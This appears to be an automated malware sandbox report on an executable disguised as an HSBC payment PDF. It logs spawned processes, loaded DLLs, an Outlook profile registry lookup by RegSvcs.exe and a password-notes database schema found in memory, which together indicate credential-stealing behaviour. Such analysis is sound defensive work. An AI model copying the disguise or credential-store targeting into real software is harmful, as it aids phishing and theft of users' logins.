Source: RegSvcs.exe, 00000011.00000002.3391146987.000000000434D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.0000000003415000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.0000000003406000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.0000000003438000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.0000000003444000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.3380159600.0000000003424000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeReversingLabs: Detection: 81%
                  Source: unknownProcess created: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                  Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                  Source: unknownProcess created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
                  Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                  Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                  Source: unknownProcess created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
                  Source: unknownProcess created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: unknownProcess created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
                  Source: unknownProcess created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                  Source: unknownProcess created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
                  Source: unknownProcess created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
                  Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh-agent.exe C:\Windows\System32\OpenSSH\ssh-agent.exe
                  Source: unknownProcess created: C:\Windows\System32\TieringEngineService.exe C:\Windows\system32\TieringEngineService.exe
                  Source: unknownProcess created: C:\Windows\System32\AgentService.exe C:\Windows\system32\AgentService.exe
                  Source: unknownProcess created: C:\Windows\System32\vds.exe C:\Windows\System32\vds.exe
                  Source: unknownProcess created: C:\Windows\System32\wbengine.exe "C:\Windows\system32\wbengine.exe"
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\alg.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: appvpolicy.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: logoncli.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\AppVClient.exeSection loaded: appmanagementconfiguration.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: tapi32.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: credui.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxstiff.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: fxsresm.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: ualapi.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\FXSSVC.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: version.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtctm.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcprx.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtclog.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxclu.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: clusapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: xolehlp.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: resutils.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ktmw32.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: comres.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: msdtcvsp1res.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: mtxoci.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: oci.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\msdtc.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: hid.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\perfhost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: napinsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: pnrpnsp.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: wshbth.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: nlaapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\snmptrap.exeSection loaded: winrnr.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: spectrumsyncclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptionsimulationextensions.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: hid.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: holographicruntimes.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: perceptiondevice.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: spatialstore.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: analogcommonproxystub.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: capabilityaccessmanagerclient.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.devices.enumeration.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: structuredquery.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: windows.globalization.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47langs.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: bcp47mrm.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: icu.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: mswb7.dll
                  Source: C:\Windows\System32\Spectrum.exeSection loaded: devdispitemprovider.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: apphelp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: libcrypto.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\TieringEngineService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: version.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: activeds.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: adsldpc.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\AgentService.exeSection loaded: appmanagementconfiguration.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\AppVClient.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic file information: File size 1587200 > 1048576
                  Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.2525911259.0000000002180000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2086108472.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000002.00000003.2582334419.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2590265360.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2581292600.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000002.00000003.2271603992.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000002.00000003.2175446283.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000002.00000003.2386599960.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000002.00000003.2386599960.0000000002180000.00000004.00001000.00020000.00000000.sdmp
